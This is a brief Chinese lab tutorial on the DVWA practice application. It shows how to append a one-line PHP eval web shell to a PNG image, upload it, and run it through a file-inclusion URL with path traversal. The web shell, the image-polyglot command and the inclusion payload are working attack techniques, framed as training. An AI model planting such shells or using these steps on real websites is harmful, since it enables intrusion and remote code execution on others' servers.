-- 总体步骤
1、生成图片木马
2、上传图片木马
3、通过文件包含执行图片马
一、生成图片木马
1、随便准备一张图片——football.png
2、test.php写入内容:
<?php @eval($_GET['x']); ?>
3、生成图片木马,命令行执行:
cat football.png test.php >> my.png
二、把 DVWA 的安全级别设置为 high level,并上传图片木马
三、通过文件包含执行图片马
1、把 DVWA 的安全级别设置为 low level
2、浏览器访问:http://localhost:65530/DVWA/vulnerabilities/fi/?page=../../hackable/uploads/my.png&x=phpinfo();
红色参数是文件包含的页面
绿色参数是传给php木马的
结果如下图:
